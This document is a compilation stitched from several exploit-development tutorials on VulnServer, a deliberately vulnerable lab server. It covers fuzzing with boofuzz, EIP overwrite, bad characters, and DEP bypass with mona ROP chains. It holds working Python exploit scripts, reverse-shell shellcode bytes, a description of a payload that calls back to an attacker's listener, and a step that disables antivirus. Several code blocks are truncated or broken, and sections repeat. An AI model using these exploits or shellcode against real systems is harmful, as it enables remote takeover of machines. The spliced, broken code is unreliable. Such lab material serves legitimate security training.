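#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(int argc, char *argv[])
{
    char buffer[5];   /* room for only 5 bytes */
    if (argc < 2)
        exit(0);
    /* No bounds check: input longer than the buffer overflows the stack. */
    strcpy(buffer, argv[1]);
    printf("strcpy() executed...\n");
    return 0;
}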
Source: GeeksForGeeks.Org
In this example, if an attacker sends a large command-line argument as input to this program,
a buffer overflow condition can occur. I say, “can,” because in modern times certain compiler
flags need to be specified, otherwise the compiler (dependent on which one used, of course)
will likely implement some sort of stack smashing protection auto-magically. One way to carry
out a buffer overflow attack against this simple C program is to do the following:
In short, we are “smashing the stack” by overflowing the char buffer with 9 bytes of input
when it has specified an expected length of 5 bytes. The stack is a memory structure used
for static memory allocation. It has a counterpart called the heap for dynamic memory
allocation, but that is a discussion for another day. The stack itself is a last-in-first-out
structure, while the byte order of the values stored on it depends on the endianness of a
given CPU. Intel processors are little-endian, meaning a multi-byte value such as an address is
stored with its least significant byte first and its most significant byte last. An important
thing to note about the stack is that it grows from higher memory to lower memory.
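Byte order is easiest to see by converting a number to bytes both ways. This short Python 3
example uses an arbitrary value (0x11223344 is not a real address) and also shows why an overflow
of four "B" characters reads back as 42424242 in a register.

```python
value = 0x11223344  # arbitrary example value, not a real address

little = value.to_bytes(4, "little")  # byte order used by x86
big = value.to_bytes(4, "big")        # shown only for comparison

print(little.hex())
print(big.hex())
print(hex(int.from_bytes(b"BBBB", "little")))
```

This is the reason exploit scripts pack return addresses in little-endian form before placing
them in the payload.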
Memory ranges:
0xFFFFFFFF
Stack growth
0x00000000
To gain control of the stack, we need to send a memory address to the instruction pointer of
the CPU to execute code located at the desired memory address. If we were to overflow data
into the stack pointer of the CPU, we would require an address pointing to a “JMP ESP” (jump
to stack pointer) instruction to gain control of execution - thus exploiting the program.
So…what is all of this, and why do we care? If you’ve ever taken a computer class, you’ve
probably heard of the CPU referred to as the “brain” of the computer. TL;DR, if you hijack the
brain, the computer does what you want it to do. The information we just covered relating to
buffer overflows was relevant circa 1995, so we have some catching up to do.
If you’ve read my post on the Vulnerability Lifecycle, you should be familiar with some modern
exploitation mitigations. The ones we are mostly concerned with today are going to
be Address Space Layout Randomization (ASLR), and Data Execution Prevention (DEP). ASLR
has been present in Microsoft Windows since Windows Vista. There are a few different forms and
implementations of ASLR, but the most
significant roadblock in terms of exploitation is kernel ASLR (KASLR). Essentially, the memory
ranges for a given application will be randomized at start-up, making any static values in an
exploit irrelevant in terms of reliability.
The other roadblock to exploitation (that we will be defeating today) is DEP. DEP has been
implemented in Windows as early as XP SP2 and Server 2003 SP1. DEP marks a page of
memory as non-executable, rendering any code we overflow to it (as an example) irrelevant.
We can defeat DEP in certain circumstances via return-oriented-programming (ROP) to certain
Windows API’s. For this to work, we have to assemble the instructions we want executed in a
fashion like this:
0x1111111A SomeInstruction
0x1111111B retn
These are called “ROP gadgets.” Multiple gadgets make up a “chain.” The goal of a “rop chain”
is to organize instructions that will do what we want, then “return,” to the next gadget of our
“chain.” This is probably the most gentle explanation you will ever read about this subject, and
it gets FAR more complicated than my quick summary. A classic example of a rop gadget is the
trusted old “pop/pop/ret” technique used in SEH exploits.
0x1111111C retn
This gadget “pops” two words off of the stack, and returns execution control to the memory
located at the 2nd address (address of the next SEH). Let’s observe some interesting
happenings on VulnServer after enabling DEP.
#!/usr/bin/env python
"""
Date: 12/18/2019
"""
import socket
import struct
import sys
host = sys.argv[1]
port = int(sys.argv[2])
# TRUN command plus the "/.:/" trigger string, followed by the overflow data.
buffer = "TRUN /.:/"
buffer += "A"*2003
buffer += "B"*4
buffer += "C"*(3500-2003-4)
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.recv(1024)
    s.send(buffer)
    s.close()
except Exception as msg:
    print msg
As a quick side-note, a lot of people don’t know where the “/.:/” string comes from and just
blindly put it in their VulnServer exploits. Not all of the exploitable functions within VulnServer
will trigger on this string. This string came from fuzzing output from SPIKE written by Dave
Aitel. So if you’ve ever wondered what the string was, or where it came from, now you know.
In short, this exploit connects to VulnServer on port 9999, sends the TRUN command, triggers
a vulnerable function within VulnServer via the “/.:/” string, and overflows that function with a
large input of A’s, B’s, and C’s. The offset to the instruction pointer was calculated at offset
2003 bytes. This exploit should result in the hex characters “42424242” showing in EIP to
demonstrate we have some level of control over the program.
Excellent! We also have overflowed data showing in ESP. So all we have to do now is find a
JMP ESP instruction, and we should be good to go, right?
1. All of the addresses start with nullbytes - thereby null-terminating the rest of our
overflowed code
2. Even if we found an address that didn’t contain nullbytes, DEP will still block us.
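The null-byte restriction in the first point can be expressed as a simple filter over candidate
addresses. This Python 3 sketch is illustrative only: the candidate values are invented, and
is_usable is a hypothetical helper rather than anything provided by mona or the debugger.

```python
import struct


def is_usable(address, bad_chars=b"\x00"):
    """True if the packed little-endian address contains no bad characters."""
    packed = struct.pack("<I", address)
    return not any(byte in bad_chars for byte in packed)


# Hypothetical candidate addresses, for illustration only.
candidates = [0x00401234, 0x10203040, 0x7C00A0B0]
usable = [hex(a) for a in candidates if is_usable(a)]
print(usable)
```

An address that fails this check would cut the payload short at the null byte, so everything
placed after it would never reach the stack.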
So we know we have some limitations with null-bytes and DEP. Mona is an excellent exploit
development, and debugging script made by Corelan. It has many features (one we’ve seen
already with finding addresses containing JMP ESP opcodes). The one we will be focusing on
right now is the “!mona rop” command. There are a lot of handy features with this command.
Let’s take a look at some of them:
There are some flags we can already see will be of great use to us, mainly the “-cp” and “-m”
arguments. We can use “-cp nonull” to look through modules that don’t contain nullbytes in
their address spaces, and the “-m” argument to specify all modules, or specific ones. Let’s
generate a rop chain with the following command:
This command will search through all loaded modules, and build a chain of ROP gadgets for us
to bypass DEP with. This will take a long time to finish, so grab a cup of coffee.
Once it’s finished, let’s take a quick look at the ROP chain created, and take a deeper look at
what’s going on.
To the layman, this is a lot of information to take in. Even for me, having already gone through
the SLAE course by Pentester Academy, there are some confusing operations going on. Let’s
take a look at the MSDN for VirtualAlloc and get a better understanding of how it relates to
DEP.
Reserves, commits, or changes the state of a region of pages in the virtual address space of the
calling process. Memory allocated by this function is automatically initialized to zero.
LPVOID VirtualAlloc(
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flAllocationType,
DWORD flProtect
);
Source: MSDN
Examining VirtualProtect (another commonly abused function to bypass DEP), we can see
there are some similarities in capabilities between these two functions:
Changes the protection on a region of committed pages in the virtual address space of the
calling process.
BOOL VirtualProtect(
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flNewProtect,
PDWORD lpflOldProtect
);
Source: MSDN
First in the sequence of our ROP chain above, it acquires the location of VirtualAlloc() from the
Import Address Table of sechost.dll, and then returns. Remember, every gadget within the
ROP chain needs to specify a retn opcode to return control back to the subsequent gadgets in
the chain. After some crafty calculations for arguments, the chain then assigns those
arguments for VirtualAlloc, and calls with the following heuristics:
This is a very quick summary, and like I said, there are parts of this ROP chain that confuse me,
so I may have messed up my analysis of it.
#!/usr/bin/env python
"""
Date: 12/18/2019
"""
import socket
import struct
import sys
host = sys.argv[1]
port = int(sys.argv[2])
def create_rop_chain():
rop_gadgets = [
0x90909090, # nop
def main():
    rop_chain = create_rop_chain()
    buffer = "TRUN /.:/"
    buffer += "A"*2003
    buffer += rop_chain
    buffer += "\xCC"*(3500-2003-len(rop_chain))
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        s.recv(1024)
        s.send(buffer)
        s.close()
    except Exception as msg:
        print msg
main()
Wow! We did it! We bypassed DEP on Windows 10! All we need to do now is add a NOP sled
for some safety, change our interrupts back to C’s, implement some shellcode, and adjust for
the new payload lengths. We’ll skip the badchar enumeration and assume “\x00” is the only
bad character (although, we should have done this much earlier in the process!).
#!/usr/bin/env python
"""
Date: 12/18/2019
"""
import socket
import struct
import sys
host = sys.argv[1]
port = int(sys.argv[2])
shellcode = b""
shellcode += b"\xba\x80\x08\x48\x4a\xd9\xc6\xd9\x74\x24\xf4\x5d\x33"
shellcode += b"\xc9\xb1\x52\x31\x55\x12\x83\xc5\x04\x03\xd5\x06\xaa"
shellcode += b"\xbf\x29\xfe\xa8\x40\xd1\xff\xcc\xc9\x34\xce\xcc\xae"
shellcode += b"\x3d\x61\xfd\xa5\x13\x8e\x76\xeb\x87\x05\xfa\x24\xa8"
shellcode += b"\xae\xb1\x12\x87\x2f\xe9\x67\x86\xb3\xf0\xbb\x68\x8d"
shellcode += b"\x3a\xce\x69\xca\x27\x23\x3b\x83\x2c\x96\xab\xa0\x79"
shellcode += b"\x2b\x40\xfa\x6c\x2b\xb5\x4b\x8e\x1a\x68\xc7\xc9\xbc"
shellcode += b"\x8b\x04\x62\xf5\x93\x49\x4f\x4f\x28\xb9\x3b\x4e\xf8"
shellcode += b"\xf3\xc4\xfd\xc5\x3b\x37\xff\x02\xfb\xa8\x8a\x7a\xff"
shellcode += b"\x55\x8d\xb9\x7d\x82\x18\x59\x25\x41\xba\x85\xd7\x86"
shellcode += b"\x5d\x4e\xdb\x63\x29\x08\xf8\x72\xfe\x23\x04\xfe\x01"
shellcode += b"\xe3\x8c\x44\x26\x27\xd4\x1f\x47\x7e\xb0\xce\x78\x60"
shellcode += b"\x1b\xae\xdc\xeb\xb6\xbb\x6c\xb6\xde\x08\x5d\x48\x1f"
shellcode += b"\x07\xd6\x3b\x2d\x88\x4c\xd3\x1d\x41\x4b\x24\x61\x78"
shellcode += b"\x2b\xba\x9c\x83\x4c\x93\x5a\xd7\x1c\x8b\x4b\x58\xf7"
shellcode += b"\x4b\x73\x8d\x58\x1b\xdb\x7e\x19\xcb\x9b\x2e\xf1\x01"
shellcode += b"\x14\x10\xe1\x2a\xfe\x39\x88\xd1\x69\x4c\x47\xd3\x79"
shellcode += b"\x38\x55\xe3\x68\xe4\xd0\x05\xe0\x04\xb5\x9e\x9d\xbd"
shellcode += b"\x9c\x54\x3f\x41\x0b\x11\x7f\xc9\xb8\xe6\xce\x3a\xb4"
shellcode += b"\xf4\xa7\xca\x83\xa6\x6e\xd4\x39\xce\xed\x47\xa6\x0e"
shellcode += b"\x7b\x74\x71\x59\x2c\x4a\x88\x0f\xc0\xf5\x22\x2d\x19"
shellcode += b"\x63\x0c\xf5\xc6\x50\x93\xf4\x8b\xed\xb7\xe6\x55\xed"
shellcode += b"\xf3\x52\x0a\xb8\xad\x0c\xec\x12\x1c\xe6\xa6\xc9\xf6"
shellcode += b"\x6e\x3e\x22\xc9\xe8\x3f\x6f\xbf\x14\xf1\xc6\x86\x2b"
shellcode += b"\x3e\x8f\x0e\x54\x22\x2f\xf0\x8f\xe6\x5f\xbb\x8d\x4f"
shellcode += b"\xc8\x62\x44\xd2\x95\x94\xb3\x11\xa0\x16\x31\xea\x57"
shellcode += b"\x06\x30\xef\x1c\x80\xa9\x9d\x0d\x65\xcd\x32\x2d\xac"
def create_rop_chain():
rop_gadgets = [
0x90909090, # nop
def main():
    rop_chain = create_rop_chain()
    nop_sled = "\x90"*8
    buffer = "TRUN /.:/"
    buffer += "A"*2003
    buffer += rop_chain
    buffer += nop_sled
    buffer += shellcode
    buffer += "C"*(3500-2003-len(rop_chain)-len(nop_sled)-len(shellcode))
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        s.recv(1024)
        s.send(buffer)
        s.close()
    except Exception as msg:
        print msg
main()
Let’s restart the application outside of the debugger, and run the exploit to see if we catch a
shell:
Outstanding! We caught the shell! This was a really fun exercise, and I learned a lot in the
process. Unfortunately, there is one very MAJOR hiccup to this exploit…and that roadblock
is…ASLR. There may be an avenue to make a 100% reliable and working exploit for this that
can survive reboots, but with my current level of knowledge I don’t know if it’s possible. If it is,
I don’t know how I might approach it. You can try for yourself to understand what I mean. Try
rebooting your virtual machine, and rerunning your exploit as-is. Does it work? Why doesn’t it
work?
** REBASED ** ASLR
All kernel modules’ base addresses will change, and their memory regions will be randomized
upon every reboot. There are some options to potentially defeat ASLR:
2. Build a rop chain from a binary or library that isn’t rebased or compiled with ASLR.
4. Search other static memory regions for opcodes to build rop chains from
https://cwinfosec.org/Intro-ROP-DEP-Bypass/
We have kernel at the top and text at the bottom. When we think of the kernel, we can think
of it as the command line. The stack is used by the processes for the storage of automatic
identifiers, register variables and information about function calls. The text segment is a
section of a program in the memory and it holds executable instructions. The heap is a
segment of memory where dynamic memory allocation takes place.
Spiking
The first step is to disable Windows Defender real-time protection, as shown below. Otherwise
Windows Defender will block vulnserver when we run anything malicious against it.
In spiking, we take each of the commands one at a time and try to overflow its buffer. If the
program crashes, we know that the command is vulnerable. To do this, we first run vulnserver
as an administrator, then run Immunity Debugger as administrator as well, and attach
vulnserver to it. We then run the following command on our Kali Linux machine:
We test each of these commands to see whether it is vulnerable. This process is called spiking.
We write a python script as shown.
We send the variable in all different forms and iterations and try to break the program. We run
this script as follows:
We should repeat the above for all the commands. When we spike the TRUN command,
Immunity reports an Access Violation and pauses, and vulnserver has crashed, so we know
that TRUN is vulnerable.
Fuzzing is similar to spiking: I send a growing run of characters and try to break the program.
I first attach vulnserver to Immunity Debugger and then run the following script to fuzz.
Fuzzing tells us whether a command is vulnerable and approximately how many bytes it takes
to cause an overflow.
When this script is run, the server crashes, and when I kill the script on my Kali Linux
machine it shows me the byte count at which the program crashed, as shown below:
We crashed at around 3000 bytes, taking a round figure. The next step is to find the offset.
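The fuzzing loop described above can be sketched roughly as follows. This is a minimal Python 3 sketch under stated assumptions, not the script used in these notes: the names fuzz and fake_target, the 100-byte step and the send callable are all hypothetical, and the network code is deliberately left to the caller so the loop can be tried against a stand-in first.

```python
def fuzz(send, prefix=b"TRUN /.:/", step=100, limit=10000):
    """Send ever larger buffers until `send` raises; return the size that failed.

    `send` is a caller-supplied function (an assumption of this sketch) that
    delivers one buffer to the target and raises OSError when the target
    stops answering.
    """
    size = step
    while size <= limit:
        try:
            send(prefix + b"A" * size)
        except OSError:
            return size      # approximate crash size, accurate to one step
        size += step
    return None              # no crash observed up to `limit`


def fake_target(crash_at):
    """Stand-in for the real service: fails once the buffer is long enough."""
    def send(data):
        if len(data) >= crash_at:
            raise OSError("target stopped responding")
    return send


if __name__ == "__main__":
    print(fuzz(fake_target(crash_at=3000)))
```

Because the buffer grows in fixed steps, the number it reports is only a round figure, which is why the next step uses a unique pattern to find the exact offset.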
Here we find where the Extended Instruction Pointer (EIP) sits in the overflowing buffer, which
allows us to point it at malicious shellcode later on. To see where we overwrite the EIP, I use a
tool that ships with Kali Linux called Pattern create, as shown below:
I then attach vulnserver to immunity debugger again and run the script and get the following
result:
Vulnserver crashes and it overwrites everything. I am interested in the value of EIP. I then use
the value of EIP to get a pattern offset using the following command:
The information retrieved is important because it tells us that at 2003 bytes we can control the
EIP. The next step is to overwrite the EIP.
In this step I use a script to overwrite and control the EIP, which is what later allows me to
execute malicious code.
I again attach vulnserver to immunity and then run the code and I get the following result:
Notice that the EIP is 42424242. I sent only 4 bytes of Bs and they all landed in EIP, which
means we now control the EIP. The next step is to find bad characters.
A bad character is a byte that breaks the shellcode, for example because the application
truncates or alters it. We have to identify these bad characters and omit them, otherwise we
will not be able to get a shell.
I run the following script again on vulnserver which has been attached to immunity.
Vulnserver crashes. To run the eye test on the bad characters, I right-click on ESP and click
Follow in Dump. This takes me to the dump pane on the left, where I can see all the characters
I sent. I check by eye whether any of them is missing or has been altered. “\x00” is almost
always a bad character, so I omitted it from the script from the beginning.
The next step is to find the right module.
Now I replace our four B’s with our return address. The return address is entered in
little-endian format, so its bytes are written in reverse order. x86 is a little-endian
architecture: the low-order byte is stored in memory at the lowest address and the high-order
byte is stored at the highest address. Thus, we enter our return address backward.
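Rather than reversing the bytes by hand, the conversion can be done with Python's struct module. This is a small Python 3 sketch; the helper name pack_address is my own, and 0x625011AF is simply the example return address used in the next step.

```python
import struct


def pack_address(addr):
    """Pack a 32-bit address the way x86 stores it in memory (little-endian)."""
    return struct.pack("<I", addr)


if __name__ == "__main__":
    ret = pack_address(0x625011AF)
    # The low-order byte (0xaf) comes first, the high-order byte (0x62) last.
    print(ret.hex())
```

The "<I" format means "little-endian, unsigned 32-bit integer", so the same helper works for any 32-bit return address.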
Now, I need to test out our return address. Again, with a freshly attached Vulnserver, we need
to find our return address in Immunity Debugger. To do this, I click on the far-right arrow on
the top panel of Immunity as shown:
Then search for “625011AF” (or the return address you found), without the quotes, in the
“Enter expression to follow” prompt. That should bring up the return address, FFE4, JMP ESP
location. I then hit F2 and the address should turn blue which shows that we have set the
breakpoint.
I then execute my code and see whether it triggers the breakpoint. If it triggers in the
immunity debugger, that means I can now develop the exploit.
To generate the shell code I create a payload and put the payload in the python script as
follows:
-p is for payload. We are using a non-staged Windows reverse shell payload.
LHOST is the ATTACKER’S IP address.
LPORT is the ATTACKER’S port of choice. Here I am using 4444.
EXITFUNC=thread adds stability to our payload.
-f is for the output format. We are going to generate C-style output here.
-a is for architecture. The machine we are attacking is x86.
--platform is for OS type. We are attacking a Windows machine.
-b is for bad characters. Remember, the only bad character we have is the null byte, \x00.
I then set up a Netcat listener to receive the connection.
I then run vulnserver on its own, execute the following code, and get a shell.
I could get this shell because Data Execution Prevention (DEP) was turned off. However,
Windows machines have the DEP protection mechanism enabled, so if I run the script while
this protection is turned on, we cannot get a shell.
However, there is a well-researched method for getting a shell even when the DEP protection
mechanism is turned on. I shall discuss this next. The image below shows DEP protection, which
is turned ON by default on Windows machines.
!mona rop -m *.dll -n -cpb "\x00"
This command creates a Return Oriented Programming chain.
-m specifies the modules which mona will search through.
-n tells mona to skip modules whose base address starts with a null byte.
-cpb lists the bad characters that must not appear in the pointers mona selects.
In order to get a shell despite the DEP protection mechanism being on, I run the above
command in the command bar of Immunity Debugger. This generates a Return Oriented
Programming (ROP) chain and saves it in a file called rop_chain.txt in Immunity Debugger’s
folder under Program Files. I then transfer the file to the Kali Linux machine.
I open the file in my Kali Linux machine and copy the python code from the Register setup for
VirtualProtect() into another python file. I also create another payload as shown above, and
the complete code looks as follows:
I set up my listener and run vulnserver and run the code and get a shell.
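As far as I understand it, the Python code taken from rop_chain.txt boils down to a list of 32-bit values that are packed one after another in little-endian order. The sketch below (Python 3) shows only that packing step. The helper name pack_chain is hypothetical and the values are placeholders, not real gadget addresses.

```python
import struct


def pack_chain(gadgets):
    """Concatenate 32-bit values into the byte string that goes on the stack."""
    return b"".join(struct.pack("<I", g) for g in gadgets)


if __name__ == "__main__":
    # Placeholder values only: these are NOT real gadget addresses.
    placeholder_chain = [0x41414141, 0x42424242, 0x90909090]
    chain = pack_chain(placeholder_chain)
    print(len(chain), chain.hex())
```

Each entry takes 4 bytes, so the length of the packed chain is what has to be subtracted when working out how much padding follows it in the buffer.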
https://medium.com/cybersecurityservices/dep-bypass-using-rop-chains-garima-chopra-e8b3361e50ce
https://medium.com/4ndr3w/linux-x86-bypass-dep-nx-and-aslr-with-return-oriented-programming-ef4768363c9a
https://tcm-sec.com/buffer-overflows-made-easy/
https://macrosec.tech/index.php/2020/11/10/dep-bypass-using-rop-chains/
Overwriting EIP
Boofuzz
Next we will need to install boofuzz on our attacker box. If you are on a Debian-based Linux
machine, you can run the following commands (if you do not have pip installed, first run
apt-get install python-pip):
2. cd boofuzz
3. pip install .
You can read more about boofuzz installation and documentation here.
To:
Vulnserver
Now we need our badly written application. I downloaded and used the .zip hosted here from
my Windows 7 VM, but feel free to download directly from the author here.
The .exe will run as long as its companion essfunc.dll file is in the same location. I moved both
to my desktop for ease of use in the Windows 7 VM.
Immunity Debugger
Next we will download our debugger which we will use to investigate how vulnserver is
behaving under different circumstances. Access the download link from your Windows 7 VM,
and fill out the requisite information (I believe dummy data will suffice.) Once you start the
installer, it will notice that you do not have Python installed and offer to install it for you.
Mona
Mona is a very robust Python tool that can be used inside Immunity to perform a broad range
of analysis for us. To install Mona, I just visited the Corelan Mona repo and copied the raw text
to a txt document inside my Windows 7 VM and saved it as mona.py.
Exploring Vulnserver
The first thing we want to do is run vulnserver.exe and then interact with the application as a
normal client to determine how the application works under normal circumstances. We don’t
need to run the process in Immunity just yet. Start the application and you should receive the
following Windows prompt:
Next, we want to interact with the listening service from our attacker and determine how the
application is supposed to work. We can use netcat for this and we’ll just make a simple TCP
connection to the target with the following command:
Immediately we see that the connection is made and that the server is offering us
the HELP command to show us valid commands for the service. Once we send
the HELP command we get the following output:
Using Boofuzz
Working off of a very detailed and helpful working aid from zeroaptitude.com, we learn that
the first element of any boofuzz fuzzing script is the ‘session.’ (For this exercise I worked
directly out of the boofuzz directory.)
The purpose of the session is to establish a named entity which details: the host we want to
connect to, the port we want to connect to, and the parameters we want to fuzz.
#!/usr/bin/python
from boofuzz import *

def main():
    pass  # the session will be defined here

if __name__ == "__main__":
    main()
This skeleton, once it includes a ‘session’, will be our template for all of our subsequent fuzzing
scripts. The session will be defined in the main() function and assigned to a variable
named session, which relies on a few global variables, namely host and port for this
exercise. Let’s see our code below:
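#!/usr/bin/python
from boofuzz import *
host = "192.168.1.201"  # Windows VM running vulnserver
port = 9999  # vulnserver port
def main():
    session = Session(target = Target(connection = SocketConnection(host, port, proto='tcp')))
    s_initialize("TRUN")  # name of the request we are describing
    s_string("TRUN", fuzzable = False)  # the command itself stays fixed
    s_delim(" ", fuzzable = False)  # we don't want to fuzz the space between "TRUN" and our arg
    s_string("FUZZ")  # the argument, which boofuzz will mutate
if __name__ == "__main__":
    main()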
Excellent, we have the first crucial piece to our boofuzz puzzle. Now we just need to add a
couple of lines to join our session with our actual fuzzing functions. We can accomplish this by
appending the following two lines to our code:
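#!/usr/bin/python
from boofuzz import *
host, port = "192.168.1.201", 9999
def main():
    session = Session(target = Target(connection = SocketConnection(host, port, proto='tcp')))
    s_initialize("TRUN")
    s_string("TRUN", fuzzable = False)
    s_delim(" ", fuzzable = False)  # we don't want to fuzz the space between "TRUN" and our arg
    s_string("FUZZ")
    session.connect(s_get("TRUN"))  # attach the "TRUN" request to our session
    session.fuzz()  # start sending test cases
if __name__ == "__main__":
    main()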
Since we want to determine how the application reacts to our fuzzing script, we need to start
vulnserver.exe in Immunity. This is easily accomplished by dragging the vulnserver.exe icon
on the desktop onto the Immunity icon, which will automatically open Immunity with
the vulnserver.exe process attached. If you have never used Immunity before, do not worry,
there are a ton of great guides online and I will be linking them in the resources section.
One thing to know is that when you attach a process to Immunity in the way we just described,
the process is not actually running yet. We need to press the small red ‘play’ triangle to start
the process as if we just double-clicked it on the desktop. Immunity even gives us a terminal
prompt as if we were running vulnserver on its own.
If you notice, in the bottom right hand side of Immunity, there is a yellow and red
message Paused indicating that the process is not running. After pressing the play symbol
(alternatively, you can use the F9 key to start the process), we need to run our python script
from our attacker to begin fuzzing the application.
If we see at any point that Immunity gives us an Access Violation error message at the bottom,
we know that the program has crashed due to our fuzzing and we can stop our fuzzer script on
our attacker.
We see pretty quickly that our fuzzer has crashed the application. After stopping our script, we
examine the Registers (FPU) pane in Immunity and see that several locations now hold
references to our payload of 41, which is the hexadecimal representation of a capital A. This
means that whenever we send our payload, it is written into these locations in memory on the
victim. We notice that EAX, ESP, EBP, and EIP all contain references to our long string
of A, with EAX also sporting a prepended TRUN /.:/ string.
Essentially what we have discovered at this point is that we are able to subvert the expected
application input in a way that allows us to take control of the value of EIP. EIP’s job is to
contain the address in memory of the next instruction to be executed. So if we can tell the
process where to go, we can tell it what to execute. If we can tell it what to execute, there is a
chance we can get it to execute a malicious payload.
Well, we know at this point that we can affect the value of EIP, but what we don’t know is
how far into our payload of A the EIP overwrite occurred. We don’t even know how many
bytes of data we sent to the application at this point; we kind of just hit a giant Fuzz Button
and watched our application crash.
Boofuzz Results
Luckily, boofuzz stores some useful information for us in a SQLite database (.db) file in the
boofuzz-results directory after each session. Once you open the .db file in a SQLite GUI, click
on the Browse Data tab and change the Table drop-down option from cases to steps. Opening
the relevant session in the GUI as described shows us the following:
In entry 15, we see our familiar string TRUN /.: and the entry above it, 14, states
that boofuzz sent 5011 bytes:
What we’ll do now is create our exploit skeleton in python and test to see if sending 5011
bytes worth of A results in us getting the same 41414141 value overwritten to EIP.
exploitSkeleton.py
We can craft up a skeleton exploit that we can stash away for later use and edit copies of as
we need them throughout this series. Our exploit skeleton will be the following:
#!/usr/bin/python
import socket
import os
import sys
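host = ""    # target IP address, set per exploit
port = 0     # target port, set per exploit
buffer = ""  # payload to send, set per exploit
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
print s.recv(1024)
s.send(buffer)
print s.recv(1024)
s.close()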
Let’s edit this code to match our exact situation by changing the host, port,
and buffer variables. Let’s also keep in mind that the fuzzer prepended our fuzz-string
with TRUN /.:/ so it’s not just as simple as multiplying A by 5011. We have to prepend
our TRUN argument as well. Our final payload should look something like this:
#!/usr/bin/python
import socket
import os
import sys
host = "192.168.1.201"
port = 9999
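buffer = "TRUN /.:/"  # prefix the fuzzer sent before its fuzz string
buffer += "A" * 5011
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
print s.recv(1024)
s.send(buffer)
print s.recv(1024)
s.close()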
Running this python script with vulnserver attached in Immunity nets us the same Registers
(FPU) panel, excellent. So we know for certain that we can overwrite EIP. The next step is to
determine how far into our string of 5011 A the overwrite occurs.
To determine this, we can leverage Mona’s ability to create a “cyclical” string of data in which
no 4-character sequence repeats. This string of data will overwrite EIP, and the 4 characters
that land there give us a unique reference point and therefore the exact location in our string
where the overwrite occurred.
To make Mona create our string, we use the following command in the white bar at the
bottom of the Immunity GUI: !mona pc 5011 (‘pc’ is short for ‘pattern-create’ and there are
multiple scripts and tools out there that will perform this for you, including Metasploit. I prefer
using Mona since I’m already in Immunity.)
Mona outputs this string (use the ASCII one) to a file called pattern.txt which is located in
the C:\Program Files\Immunity Inc\Immunity Debugger directory. Make sure you copy the
string from this file and not the pane in Immunity as the string in the pane might be truncated
(especially at 5000 bytes). This string now becomes our buffer and we feed it back to a
restarted vulnserver process in Immunity.
#!/usr/bin/python
import socket
import os
import sys
host = "192.168.1.201"
port = 9999
buffer = "TRUN /.:/"
buffer +=
"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3
Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7A
e8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3
Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak
1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5A
m6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8A
o9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar
3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9
Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw
3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay
7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2
Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7
Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3
Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj
0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl
8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0B
o1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq
5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1B
t2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7
Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1
